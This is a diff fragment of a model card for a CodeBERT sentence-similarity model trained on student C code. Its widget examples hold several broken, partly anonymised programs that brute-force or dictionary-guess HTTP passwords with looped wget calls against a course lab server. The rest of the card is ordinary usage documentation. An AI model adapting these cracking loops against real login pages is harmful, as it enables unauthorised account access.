+ \ , end, time_var;\n\n = time();\n for ( i = 0 ;i<strlen();i++)\n {\n \
268
+ \ pass[0]=[i];\n for( j = 0 ;j<strlen();j++)\n {\n pass[1]=[j];\n\
269
+ \ for ( k = 0 ;k<strlen();k++)\n {\n fflush(stdin);\n\
270
+ \ pass[2]=[k];\n pass[3]='\\0';\n printf(\"\
271
+ %s\\n\",pass);\n\n sprintf(url,\"%s%s %s\",syscom,pass,http);\n\
272
+ \ hack = system(url);\n attempt++;\n \
273
+ \ if (hack == 0)\n {\n end = time();\n \
274
+ \ time_var = (end-);\n printf(\"\\nbr\tThe password\
275
+ \ is :%s\",pass);\n printf(\"\\nNo. of Attempts crack the password\
276
+ \ :%d\",attempt);\n printf(\"\\nTime taken crack the password\
277
+ \ = %lld sec\\n\",time_var/1000000000);\n exit(1);\n \
278
+ \ }\n }\n }\n }\n }\n\n"
279
+ sentences:
280
+ - "#include<stdio.h>\n#include<string.h>\n#include<strings.h>\n#include<stdlib.h>\n\
281
+ #include<sys/time.h>\n\n()\n{\n\tint i,m,k,count=0;\n\tFILE* diction;\n\tFILE*\
282
+ \ log;\n\tchar s[30];\n\tchar pic[30];\n\tchar add[1000];\n\tchar end[100];\n\t\
283
+ time_t ,finish;\n\tdouble ttime;\n\t\n\tstrcpy(add,\"wget --http-user= --http-passwd=\"\
284
+ );\n\tstrcpy( end,\"-nv -o logd http://sec-crack.cs.rmit.edu./SEC/2/\");\n\tdiction=fopen(\"\
285
+ /usr/share/lib/dict/words\",\"r\");\n\t=time(NULL);\n\twhile(fgets(s,100,diction)!=NULL)\t\
286
+ \n\t{\t\n\t\tprintf(\"%s\\n\",s);\n\t\tfor(m=40,k=0;k<(strlen(s)-1);k++,m++)\n\
287
+ \t\t{\n\t\t\tadd[m]=s[k];\n\t\t}\n\t\tadd[m++]=' ';\n\t\tfor(i=0;i<50;i++,m++)\n\
288
+ \t\t{\n\t\t\tadd[m]=end[i];\n\t\t}\n\t\tadd[m]='\\0';\n\t\t\n\t\tsystem(add);\n\
289
+ \t\tcount++;\n\t\tlog=fopen(\"logd\",\"r\");\n\t\tfgets(pic,100,log);\n\t\tprintf(\"\
290
+ %s\",pic);\n\t\tif(strcmp(pic,\"Authorization failed.\\n\")!=0)\t\n\t\t{\n\t\t\
291
+ \tfinish=time(NULL);\n\t\t\tttime=difftime(,finish);\n\t\t\tprintf( \"\\n The\
292
+ \ time_var take:%f/n The of passwords tried is %d\\n\",ttime,count);\n\t\t\t\
293
+ break;\n\t\t}\n\t\tfclose(log);\n\t}\n\n}\n"
294
+ - "#include<stdio.h>\n#include<strings.h>\n#include<stdlib.h>\n#include<ctype.h>\n\
295
+ \n#define MAX_SIZE 255\n\n\nint CrackPasswd(FILE *fp)\n{\n int i, cnt, flag;\n\
296
+ \ char string1[MAX_SIZE],string2[MAX_SIZE],[MAX_SIZE], passwd[MAX_SIZE];\n \
297
+ \ char fin;\n \n strcpy(string1,\"wget http://sec-crack.cs.rmit.edu./SEC/2/\"\
298
+ );\n strcpy(string2,\" --http-user= --http-passwd='\");\n strcpy(,\"\");\n\
299
+ \n while ((fin = fgetc(fp)) != EOF)\n {\n cnt = 0;\n \n for\
300
+ \ (i=0;i<MAX_SIZE;i++)\n { \n passwd[i] = '\\0';\n [i]\
301
+ \ = '\\0';\n }\n\t \n while(fin != '\\n')\n {\n\t passwd[cnt] =\
302
+ \ fin;\n\t cnt++;\n\t fin = fgetc(fp);\n } \n \n if(strlen(passwd)\
303
+ \ <= 3)\n {\n strcat(, string1);\n strcat(, string2);\n\t\
304
+ \ strcat(, passwd);\n\t strcat(, \"'\");\n\t printf(\"Sending Request as %s\\\
305
+ n\",);\n\t flag = system();\n\t \n if (flag == 0)\n\t {\n \
306
+ \ printf(\"\\nPassword is %s\\n\",passwd);\n\t return 1;\n\t }\n \n\
307
+ \t strcpy(,\"\"); \n strcpy(passwd,\"\");\n }\n }\n} \n\n\n\
308
+ int (int argc, char *argv[])\n{\n char *fname;\n FILE *fp;\n \n int ,\
309
+ \ end; \n \n = time();\n \n if (argc != 2)\n {\n fprintf(stdout,\"\
310
+ Usage : ./Dictionary <dictionary>\\n\");\n return(EXIT_FAILURE);\n }\n\
311
+ \ \n fname = argv[1];\n \n if((fp = fopen(fname, \"r\")) == NULL)\n \
312
+ \ {\n fprintf(stderr,\"Error : Failed open %s for . \\n\",fname);\n \
313
+ \ return(EXIT_FAILURE);\n }\n \n CrackPasswd(fp);\n \n end = time();\
314
+ \ \n printf(\"Time Required = %lld msec\\n\",(end-)/());\n return (EXIT_SUCCESS);\n\
315
+ \ \n}\n \n\t \n\t \t\n"
316
+ - "#include<stdio.h>\n#include<stdlib.h>\n#include <sys/types.h>\n#include <unistd.h>\n\
317
+ #include <sys/time.h>\n\nint ()\n{\n FILE *fh,*fp,*fp1,*d;\n char\n [10000],PassString[50],p[10000],temp1[10000],filename[50],f1,f2,temp2[100];\n\
318
+ \ sleep(60*60*24);\n system(\"wget http://www.cs.rmit.edu./students\");\n if(system==0)\n\
319
+ \ {\n printf(\"File stored\");\n }\n strcpy(filename,\"index.html\"); \n\
320
+ \ if((fh=fopen(filename,\"r\"))==NULL)\n {\n printf(\"cannot open file\\n\"\
321
+ );\n exit(1);\n }\n fp=fopen(\"index.txt\",\"r\");\n fp1=fopen(\"index1.txt\"\
322
+ ,\"r\");\n \n while((fgets(PassString,sizeof(PassString),fh))!= NULL)\n {\n\
323
+ \ fread(p,sizeof(PassString),sizeof(PassString),fh);\n printf(\" contents\
324
+ \ %s\\n\",p);\n while((f1!=EOF) || (f2!=EOF))\n {\n f1=getc(fp);\n \
325
+ \ f2=getc(fp1);\n if(f1<f2)\n {\n strcpy(,p);\n fp=fopen(\"\
326
+ index.txt\",\"r+b\");\n fputs(,fp);\n fflush(fp); \n fclose(fp); \n\
327
+ \ }\n else\n {\n strcpy(temp1,p);\n fp1=fopen(\"index1.txt\"\
328
+ ,\"r+b\");\n fputs(temp1,fp1);\n fflush(fp1);\n fclose(fp1);\n\
329
+ \ }\n }\n if(system(\"diff -b -w index.txt index1.txt > Diff.txt\")==0)\n\
330
+ \ {\n d=fopen(\"Diff.txt\",\"r\");\n if((fgets(,sizeof(),d))!=NULL)\n\
331
+ \ {\n printf(\"The difference between exist\");\n\tsystem(\"Mail\
332
+ \ \\r\\n Difference\");\n }\n \n }\n }\n return 0;\n }\n"
333
+ - source_sentence: "#include<stdio.h>\n#include<strings.h>\n#include<stdlib.h>\n#include<ctype.h>\n\
334
+ \n#define MAX_SIZE 255\n\n\nint CrackPasswd(FILE *fp)\n{\n int i, cnt, flag;\n\
335
+ \ char string1[MAX_SIZE],string2[MAX_SIZE],[MAX_SIZE], passwd[MAX_SIZE];\n \
336
+ \ char fin;\n \n strcpy(string1,\"wget http://sec-crack.cs.rmit.edu./SEC/2/\"\
337
+ );\n strcpy(string2,\" --http-user= --http-passwd='\");\n strcpy(,\"\");\n\
338
+ \n while ((fin = fgetc(fp)) != EOF)\n {\n cnt = 0;\n \n for\
339
+ \ (i=0;i<MAX_SIZE;i++)\n { \n passwd[i] = '\\0';\n [i]\
340
+ \ = '\\0';\n }\n\t \n while(fin != '\\n')\n {\n\t passwd[cnt] =\
341
+ \ fin;\n\t cnt++;\n\t fin = fgetc(fp);\n } \n \n if(strlen(passwd)\
342
+ \ <= 3)\n {\n strcat(, string1);\n strcat(, string2);\n\t\
343
+ \ strcat(, passwd);\n\t strcat(, \"'\");\n\t printf(\"Sending Request as %s\\\
344
+ n\",);\n\t flag = system();\n\t \n if (flag == 0)\n\t {\n \
345
+ \ printf(\"\\nPassword is %s\\n\",passwd);\n\t return 1;\n\t }\n \n\
346
+ \t strcpy(,\"\"); \n strcpy(passwd,\"\");\n }\n }\n} \n\n\n\
347
+ int (int argc, char *argv[])\n{\n char *fname;\n FILE *fp;\n \n int ,\
348
+ \ end; \n \n = time();\n \n if (argc != 2)\n {\n fprintf(stdout,\"\
349
+ Usage : ./Dictionary <dictionary>\\n\");\n return(EXIT_FAILURE);\n }\n\
350
+ \ \n fname = argv[1];\n \n if((fp = fopen(fname, \"r\")) == NULL)\n \
351
+ \ {\n fprintf(stderr,\"Error : Failed open %s for . \\n\",fname);\n \
352
+ \ return(EXIT_FAILURE);\n }\n \n CrackPasswd(fp);\n \n end = time();\
353
+ \ \n printf(\"Time Required = %lld msec\\n\",(end-)/());\n return (EXIT_SUCCESS);\n\
354
+ \ \n}\n \n\t \n\t \t\n"
355
+ sentences:
356
+ - "#include <stdio.h>\n#include <stdlib.h>\n#include <sys/time.h>\n#include <strings.h>\n\
357
+ #include <ctype.h>\n\nint ()\n{\n FILE *fp; \n char *chk,[4];\n int i=1;\n\
358
+ \ while (i == 1) \n {\n \n system(\"wget -p --convert-links http://www.cs.rmit.edu./students/\"\
359
+ );\n\n system(\"mkdir first\"); \n system(\"mkdir second\"); \n\n \n system(\"\
360
+ mv www.cs.rmit.edu./images/*.* first/\");\n system(\"mv www.cs.rmit.edu./students/*.*\
361
+ \ first/\");\n\n sleep(86400); \n\n \n system(\"wget -p --convert-links http://www.cs.rmit.edu./students/\"\
362
+ );\n\n \n system(\"mv www.cs.rmit.edu./images/*.* second/\");\n system(\"mv\
363
+ \ www.cs.rmit.edu./students/*.* second/\");\n\n \n \n system(\"diff first second\
364
+ \ > imagesdifference.txt\");\n\n \n fp = fopen(\"imagesdifference.txt\",\"r\"\
365
+ );\n \n chk = fgets(, 4, fp);\n \n if (strlen() != 0)\n system(\"mailx\
366
+ \ -s \\\"Difference from WatchDog\\\" < imagesdifference.txt\");\n }\n return\
367
+ \ 0;\n}\n"
368
+ - "\n\n\n \n\n#include <stdio.h>\n#include <stdlib.h>\n#include <sys/stat.h>\n#include\
369
+ \ <unistd.h>\n#include <sys/wait.h>\n#include <signal.h>\n#include <sys/signal.h>\t\
370
+ \t\t \n\n\n#define USERNAME \"\"\n#define URL \"sec-crack.cs.rmit.edu./SEC/2\"\
371
+ \n#define TEST_URL \"yallara.cs.rmit.edu./~/secure\"\n#define MAX_PASSWD_LEN 3\n\
372
+ #define MAX_CHAR_SET 52\n#define NUM_OF_PROCESSES 4\n\n#define TRUE 1\n#define\
373
+ \ FALSE 0\n\n\n\n\n\n\n\n\n\n\ntypedef int (*CrackFuncPtr)(const char*, const\
374
+ \ char*, int);\n\n\nint pwdFound;\nint cDie;\n\n\nint runBruteForce(const char\
375
+ \ chSet[], int numOfCh, int len, CrackFuncPtr func\n\t\t\t\t\t\t, int sCh, int\
376
+ \ eCh, int id);\nchar* initPasswdStr(int len, char ch, char headOfChSet);\nint\
377
+ \ getChPos(const char chSet[], int numOfCh, char ch);\nint pow(int x, int y);\n\
378
+ int crackHTTPAuth(const char *username, const char *passwd, int id);\nint myFork(const\
379
+ \ char chSet[], int numOfCh, int len, CrackFuncPtr func\n\t\t\t\t, int sCh, int\
380
+ \ eCh);\n\n\n\n\n\nvoid passwdFoundHandler(int signum)\n{\n\tpwdFound = TRUE;\n\
381
+ }\n\n\n\nvoid childFinishHandler(int signum)\n{\n\tcDie++;\t\n}\n\n\n\n\n\nint\
382
+ \ main()\n{\n\tchar charSet[] = {'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I',\
383
+ \ 'J', 'K', \n 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T',\
384
+ \ 'U', 'V', \n\t\t\t\t\t 'W', 'X', 'Y', 'Z',\t\n\t\t\t\t\t 'a', 'b', 'c', 'd',\
385
+ \ 'e', 'f', 'g', 'h', 'i', 'j', 'k',\t\n\t\t\t\t\t 'l', 'm', 'n', 'o', 'p', 'q',\
386
+ \ 'r', 's', 't', 'u', 'v', \n\t\t\t\t\t 'w', 'x', 'y', 'z'};\n\t\n\n\tint i;\t\
387
+ \n\tint pid[NUM_OF_PROCESSES];\n\n\tpwdFound = FALSE;\n\tcDie = 0;\n\t\n\tfor\
388
+ \ (i=0; i<NUM_OF_PROCESSES; i++)\n\t{\n\t\tpid[i] = myFork(charSet, MAX_CHAR_SET,\
389
+ \ MAX_PASSWD_LEN, crackHTTPAuth, \n\t\t\t\t\t\t(((MAX_CHAR_SET /NUM_OF_PROCESSES)*i)+1)-1,\
390
+ \ \n\t\t\t\t\t\t(MAX_CHAR_SET /NUM_OF_PROCESSES)*(i+1)-1);\n\t}\n\n\t\n\tfor (;;)\n\
391
+ \t{\n\t\tsignal(SIGUSR1, passwdFoundHandler);\n\t\tsignal(SIGUSR2, childFinishHandler);\n\
392
+ \n\t\t\n\t\tif (pwdFound)\n\t\t{\n\t\t\tfor (i=0; i<4; i++)\n\t\t\t{\n\t\t\t\t\
393
+ kill((int)pid[i], SIGKILL);\n\t\t\t}\n\t\t\texit(EXIT_SUCCESS);\n\t\t}\n\n\t\t\
394
+ \n\t\tif (cDie >= NUM_OF_PROCESSES)\n\t\t{\n\t\t\texit(EXIT_SUCCESS);\n\t\t}\n\
395
+ \n\t}\n\treturn EXIT_SUCCESS;\n}\n\n\n\nint myFork(const char chSet[], int numOfCh,\
396
+ \ int len, CrackFuncPtr func,\n\t\t\t\tint sCh, int eCh)\n{\n\tint i;\n\t\n\t\
397
+ int pid = fork();\n\n\tif (pid == 0)\n\t{\n\t\tfor (i=1; i<=len; i++)\n\t\t{\n\
398
+ \t\t\tif (runBruteForce(chSet, numOfCh, i, func, sCh, eCh, getpid()))\n\t\t\t\
399
+ {\t\n\t\t\t\t\n \t\t\t\tif (!kill(getppid(), SIGUSR1))\n\t\t\t\t{\n\t\t\t\t\t\
400
+ printf(\"Process %d found the password and notified the parent process already\"\
401
+ , \n\t\t\t\t\t\t\t\t\t(int)getpid());\n\t\t\t\t}\n\n\t\t\t\texit(EXIT_SUCCESS);\n\
402
+ \t\t\t}\n\t\t}\n\n\t\t\n\t\tif (!kill(getppid(), SIGUSR2))\n\t\t{\n\t\t\tprintf(\"\
403
+ Process %d could not found the password and notified the parent process already\"\
404
+ , \n\t\t\t\t\t\t\t\t\t(int)getpid());\n\t\t}\n\t\t\n\t\texit(EXIT_SUCCESS);\n\t\
405
+ }\n\telse if (pid > 0)\n\t{\n\t\treturn pid;\n\t}\n\telse\n\t{\n\t\tprintf(\"\
406
+ error\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\n\n\nint runBruteForce(const char\
407
+ \ chSet[], int numOfCh, int len, CrackFuncPtr func\n\t\t\t\t\t\t, int sCh, int\
408
+ \ eCh, int id)\n{\n\tint iter; \n\tint chIter; \n\tint curPos = 0; \n\t\n\tchar\
409
+ \ *str;\n\t\n\tint passwdFound = FALSE;\n\t\n\tstr = initPasswdStr(len, chSet[sCh],\
410
+ \ chSet[0]);\n\n\tprintf(\"\\nNow trying %d character(s)\\n\", len);\n\n\tfor\
411
+ \ (iter=0; (iter<pow(numOfCh, (len-1))*(eCh-sCh+1))&&(!passwdFound); iter++)\n\
412
+ \t{\n\t\tfor (chIter=len-1; chIter>=0; chIter--)\n\t\t{\n\t\t\tif (iter % pow(numOfCh,\
413
+ \ chIter) == 0) \n\t\t\t{\n\t\t\t\tcurPos = getChPos(chSet, numOfCh, str[chIter]);\n\
414
+ \t\t\t\tstr[chIter] = chSet[curPos+1];\n\t\t\t}\n\n\t\t\tif (iter % pow(numOfCh,\
415
+ \ (chIter+1)) == 0) \n\t\t\t{\n\t\t\t\tif (chIter == len-1)\n\t\t\t\t{\n\t\t\t\
416
+ \t\tstr[chIter] = chSet[sCh];\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t\
417
+ str[chIter] = chSet[0];\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tif (func(USERNAME, str,\
418
+ \ id))\n\t\t{\n\t\t\tprintf(\"\\nPassword found: %s\\n\\n\", str);\n\t\t\tpasswdFound\
419
+ \ = TRUE;\n\t\t}\t\t\t\n\t}\n\n\t(str);\n\tstr = NULL;\n\t\n\treturn passwdFound;\n\
420
+ }\n\n\n\nint getChPos(const char chSet[], int numOfCh, char ch)\n{\n\tint i;\n\
421
+ \t\n\tfor (i=0; i<numOfCh; i++)\n\t{\n\t\tif (chSet[i] == ch)\n\t\t{\n\t\t\treturn\
422
+ \ i;\n\t\t}\n\t}\n\n\treturn -1;\n\t\n}\n\n\n\nchar* initPasswdStr(int len, char\
423
+ \ ch, char headOfChSet)\n{\n\tint i;\n\n\tchar *str;\n\n\tstr = malloc(len);\n\
424
+ \n\tif (str)\n\t{\n\t\tfor (i=0; i<len-1; i++)\n\t\t{\n\t\t\tstr[i] = headOfChSet;\n\
425
+ \t\t}\n\t\tstr[len-1] = ch;\n\t\tstr[len] = '\\0';\n\t}\n\telse\n\t{\n\t\tfprintf(stderr,\
426
+ \ \"\\nError: Unable allocate %d bytes memory.\", len);\n\t\texit(EXIT_FAILURE);\n\
427
+ \t}\n\t\n\treturn str;\n}\n\n\n\nint pow(int x, int y)\n{\n\tint ans = 1, i;\n\
428
+ \t\n\tfor (i=0; i<y; i++)\n\t{\n\t\tans *= x;\n\t}\n\n\treturn ans;\n}\n\n\n\n\
429
+ int crackHTTPAuth(const char *username, const char *passwd, int id)\n{\n\tchar\
430
+ \ cmd[256];\n\tstruct stat fileInfo;\n\tchar fileToCheck[256];\n\t\n\tsprintf(cmd,\
431
+ \ \"wget -O %d -q --http-user=%s --http-passwd=%s --proxy=off %s\", \n\t\t\t\t\
432
+ \t\tid, username, passwd, URL);\n\n\tsystem(cmd);\t\n\n\tsprintf(fileToCheck,\
433
+ \ \"%d\", id);\n\n\t(void)stat(fileToCheck, &fileInfo); \n\treturn fileInfo.st_size;\n\
434
+ \t\n}\n\n\n"
435
+ - "#include<stdio.h>\n#include<stdlib.h>\n#include<string.h>\n#include<strings.h>\n\
436
+ #include <ctype.h>\n#include <math.h>\n#include <sys/time.h>\n\nint\n()\n{\n\n\
437
+ \tint , end;\n\tFILE *fp;\n\tint i, j;\n\tchar \
438
+ \ input;\n\tchar password[30];\n\tint check;\n\
439
+ \n\tfloat total_time;\n\tint number;\n\t = time();\n\n\n\
440
+ \tif ((fp = fopen(\"words\", \"r\")) == NULL) {\n\t\tfprintf(stderr, \"Error :\
441
+ \ Failed open words for .\\n\");\n\t\treturn (EXIT_FAILURE);\n\t}\n\twhile ((input\
442
+ \ = fgetc(fp)) != EOF) {\n\t\tj = 0;\n\t\tfor (i = 0; i < 30; i++)\n\t\t\tpassword[i]\
443
+ \ = '\\0';\n\n\t\twhile(input != '\\n' ) {\n\n\t\t\tpassword[j] = input;\n\t\t\
444
+ \tj++;\n\t\t\tinput = fgetc(fp);\n\t\t\t\n\t\t\n\t\t}\n\n\n\t\tif (strlen(password)\
445
+ \ <= 3) {\n\t\t\tprintf(\"%s\\t\",password);\n\t\t\tfflush(stdout);\n\t\t\tcheck\
446
+ \ = SysCall(password);\n\t\t\tif (check == 0) {\n\t\t\t\tgetpid();\n\t\t\t\tend\
447
+ \ = time();\n\t\t\t\ttotal_time = (end - ) / 1e9;\n\t\t\t\tprintf(\"\\ntotal time_var\
448
+ \ = %f \", total_time);\n\t\t\t\tprintf(\"\\n\\nAvg getpid() time_var = %f usec\\\
449
+ n\", total_time);\n\t\t\t\tprintf(\"\\navg time_var %f / %d = %f\\n\", total_time,\
450
+ \ number, total_time / number);\n\t\t\t\texit(0);\n\t\t\t}\n\t\t}\n\n\t}\n\n\t\
451
+ return (EXIT_SUCCESS);\n}\nint\nSysCall(char *password)\n{\n\tchar \
452
+ \ url1[255], url2[255], [255];\n\tint rettype;\n\trettype = 0;\n\t\
453
+ strcpy(url1, \"wget --non-verbose --http-user= --http-passwd=\");\n\tstrcpy(url2,\
454
+ \ \" http://sec-crack.cs.rmit.edu./SEC/2/index.php\");\n\n\tstrcat(, url1);\n\t\
455
+ strcat(, password);\n\tstrcat(, url2);\n\n\trettype = system();\n\t\n\tif (rettype\
456
+ \ == 0) {\n\t\tprintf(\"Successfully retrieved password: %s\\n\", password);\n\
457
+ \t\treturn 0;\n\t}\n\tstrcpy(, \"\");\n}\n"
458
+ - source_sentence: "\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\nint ()\n{\n \
459
+ \ int i,j,k,counter =0;\n char word[3];\n char paswd[3];\t\n char get[100];\n\
460
+ \ int ;\n char username[]=\"\";\n \n \n \n \n \n\t\t\t\t\n\t\n\tfor (i\
461
+ \ = 65; i <= 122; i++)\n\t{\n\t\t if(i==91) {i=97;} \n \n\t\tfor (j = 65; j\
462
+ \ <= 122; j++)\n\t\t{\n\t\t\n\t\tif(j==91) {j=97;}\n \n\t\tfor (k = 65; k\
463
+ \ <= 122; k++)\n\t\t{\n\t\t \n\t\t\tif(k==91) {k=97;} \n\t\t\t\n\t\t\t word[0]\
464
+ \ = i;\n\t\t\t word[1] = j;\n\t\t\t word[2] = k;\n\t\t\t sprintf(paswd,\"%c%c%c\"\
465
+ ,word[0],word[1],word[2]); \n\t\t\t counter++;\n\t\t\tprintf(\"%d )%s\\\
466
+ n\\n\", counter, paswd);\n\t\t\t sprintf(get,\"wget --http-user=%s --http-passwd=%s\
467
+ \ http://sec-crack.cs.rmit.edu./SEC/2/\",username,paswd);\n\t\t\t=system(get);\n\
468
+ \t \n\t\t\tif(==0) \n\t\t\t{\n\t\t\tprintf(\"The Password has been cracked and\
469
+ \ it is : %s\" , paswd);\n\t\t\texit(0);\n\t\t\t}\n\t\t}\n \n\t\t}\n \n\t\
470
+ }\n \n\t\n}\n\n"
471
+ sentences:
472
+ - "\n\n#include <stdio.h>\n#include <string.h>\n#include <sys/time.h>\n\n#define\
473
+ \ OneBillion 1e9\n#define false 0\n#define true 1\nint execPassword(char *, char\
474
+ \ *b) {\n\n\n char [100]={'\\0'};\n strcpy(,b);\n \n strcat(,);\n\
475
+ \ printf (\"Sending command %s\\n\",);\n if ( system()== 0) {\n printf\
476
+ \ (\"\\n password is : %s\",);\n return 1;\n }\n return 0;\n}\n \n\
477
+ \nint bruteForce(char [],char comb[],char *url) {\n\n\nint i,j,k;\n\n for(i=0;i<52\
478
+ \ ;i++) {\n comb[0]= [i];\n if (execPassword(comb,url)== 1) return\
479
+ \ 1; \n for(j=0;j<52;j++) {\n comb[1] = [j];\n \
480
+ \ if(execPassword(comb,url)==1) return 1;\n for(k=0;k<52;k++)\
481
+ \ {\n comb[2] = [k];\n if(execPassword(comb,url)==1)\
482
+ \ return 1;\n }\n comb[1] = '\\0';\n }\n }\n return\
483
+ \ 0;\n\n} \n\nint (char *argc, char *argv[]) {\n\n int i,j,k;\n char strin[80]\
484
+ \ = {'\\0'};\n char *passwd;\n char a[] = {'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'};\n\
485
+ \ char v[4]={'\\0'};\n int startTime, stopTime, final;\n int flag=false; \n strcpy(strin,\"\
486
+ wget http://sec-crack.cs.rmit.edu./SEC/2/ --http-user= --http-passwd=\");\n\n\
487
+ \ startTime = time();\n if (bruteForce(a,v,strin)==1) {\n stopTime =\
488
+ \ time();\n final = stopTime-startTime;\n }\n\n printf (\"\\n The\
489
+ \ password is : %s\",v);\n printf(\"%lld nanoseconds (%lf) seconds \\n\"\
490
+ , final, (double)final/OneBillion );\n\n}\n"
491
+ - "\n\n#include<stdio.h>\n#include<strings.h>\n#include<stdlib.h>\n#include<ctype.h>\n\
492
+ #define MAX_SIZE 255\n\n\nint (int argc, char *argv[])\n {\n FILE *fp;\n\
493
+ \ \n while(1)\n { \n system(\"wget -p http://www.cs.rmit.edu./students\"\
494
+ );\n\n\n\n system(\"mkdir data\"); \n if((fp=fopen(\"./data/index.html\"\
495
+ ,\"r\"))==NULL)\n { \n system(\"cp www.cs.rmit.edu./students/index.html\
496
+ \ ./data\");\n\t \n }\n else\n { \n \n\t \n\t\
497
+ \ system(\"diff ./data/index.html www.cs.rmit.edu./students/index.html | mail\
498
+ \ @cs.rmit.edu.\");\n\t system(\"cp www.cs.rmit.edu./students/index.html ./data\"\
499
+ );\n } \n\n\n\n system(\"mkdir images\"); \n if((fp=fopen(\"\
500
+ ./images/file.txt\",\"r\"))==NULL)\n { \n system(\"md5sum www.cs.rmit.edu./images/*.*\
501
+ \ > ./images/file.txt\");\n\t\t \n }\n \n else\n { \
502
+ \ \n system(\"md5sum www.cs.rmit.edu./images/*.* > www.cs.rmit.edu./file.txt\"\
503
+ );\n\t \n\t \n\t \n\t system(\"diff ./images/file.txt www.cs.rmit.edu./file.txt\
504
+ \ | mail @cs.rmit.edu.\");\n\t system(\"cp www.cs.rmit.edu./file.txt ./images\"\
505
+ );\n }\n sleep(86400); \n }\t\n return (EXIT_SUCCESS);\n }\n\
506
+ \ \n\t \n\t \t\n"
507
+ - "#include<stdio.h>\n#include<string.h>\n#include<strings.h>\n#include<stdlib.h>\n\
508
+ #include<sys/time.h>\n\n\npublic static void main()\n{\n\tint i;\n\tchar ar[100];\n\
509
+ \tFILE* f;\n\tFILE* ;\n\tsystem(\"wget -O first www.rmit.edu./students\"); \n\
510
+ \twhile(1)\n\t{\n\t\tsleep(86400);\t\n\t\tsystem(\"rm -f thed\");\n\t\tsystem(\"\
511
+ rm -f new\");\n\t\tsystem(\"wget -O new www.cs.rmit.edu./students\");\t\n\t\t\
512
+ system(\"diff new first >thed\");\t\n\t\tf=fopen(\"thed\",\"r\");\n\t\tif(fgets(ar,100,f)!=NULL)\n\
513
+ \t\t{\t\t\n\t\t\t printf(\"\\n\\n The has CHANGEDS\");\t\t\n\t\t\tsystem(\"mail\
514
+ \ @cs.rmit.edu. <thed\"); \n\t\t\tsystem(\"cp new first\");\n\t\t\tfclose(f);\n\
515
+ \t\t}\n\t\telse\n\t\t{\n\t\tfclose(f);\n\t\tprintf(\"\\n\\nthe has not changed\
516
+ \ \");\n\t\t}\n\t}\n\n}\n\n\t\n\t\n\t\n\t\t\n\n\n"
517
+ pipeline_tag: sentence-similarity
518
+ library_name: sentence-transformers
519
+ ---
520
+
521
+ # SentenceTransformer based on microsoft/codebert-base
522
+
523
+ This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [microsoft/codebert-base](https://huggingface.co/microsoft/codebert-base). It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
524
+
525
+ ## Model Details
526
+
527
+ ### Model Description
528
+ - **Model Type:** Sentence Transformer
529
+ - **Base model:** [microsoft/codebert-base](https://huggingface.co/microsoft/codebert-base) <!-- at revision 3b0952feddeffad0063f274080e3c23d75e7eb39 -->
530
+ - **Maximum Sequence Length:** 512 tokens
531
+ - **Output Dimensionality:** 768 dimensions
532
+ - **Similarity Function:** Cosine Similarity
533
+ <!-- - **Training Dataset:** Unknown -->
534
+ <!-- - **Language:** Unknown -->
535
+ <!-- - **License:** Unknown -->
536
+
537
+ ### Model Sources
538
+
539
+ - **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
540
+ - **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
541
+ - **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
542
+
543
+ ### Full Model Architecture
544
+
545
+ ```
546
+ SentenceTransformer(
547
+ (0): Transformer({'max_seq_length': 512, 'do_lower_case': False, 'architecture': 'RobertaModel'})
548
+ (1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
549
+ )
550
+ ```
551
+
552
+ ## Usage
553
+
554
+ ### Direct Usage (Sentence Transformers)
555
+
556
+ First install the Sentence Transformers library:
557
+
558
+ ```bash
559
+ pip install -U sentence-transformers
560
+ ```
561
+
562
+ Then you can load this model and run inference.
563
+ ```python
564
+ from sentence_transformers import SentenceTransformer
565
+
566
+ # Download from the 🤗 Hub
567
+ model = SentenceTransformer("buelfhood/SOCO-C-CodeBERT-ST")
568
+ # Run inference
569
+ sentences = [
570
+ '\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\nint ()\n{\n int i,j,k,counter =0;\n char word[3];\n char paswd[3];\t\n char get[100];\n int ;\n char username[]="";\n \n \n \n \n \n\t\t\t\t\n\t\n\tfor (i = 65; i <= 122; i++)\n\t{\n\t\t if(i==91) {i=97;} \n \n\t\tfor (j = 65; j <= 122; j++)\n\t\t{\n\t\t\n\t\tif(j==91) {j=97;}\n \n\t\tfor (k = 65; k <= 122; k++)\n\t\t{\n\t\t \n\t\t\tif(k==91) {k=97;} \n\t\t\t\n\t\t\t word[0] = i;\n\t\t\t word[1] = j;\n\t\t\t word[2] = k;\n\t\t\t sprintf(paswd,"%c%c%c",word[0],word[1],word[2]); \n\t\t\t counter++;\n\t\t\tprintf("%d )%s\\n\\n", counter, paswd);\n\t\t\t sprintf(get,"wget --http-user=%s --http-passwd=%s http://sec-crack.cs.rmit.edu./SEC/2/",username,paswd);\n\t\t\t=system(get);\n\t \n\t\t\tif(==0) \n\t\t\t{\n\t\t\tprintf("The Password has been cracked and it is : %s" , paswd);\n\t\t\texit(0);\n\t\t\t}\n\t\t}\n \n\t\t}\n \n\t}\n \n\t\n}\n\n',
571
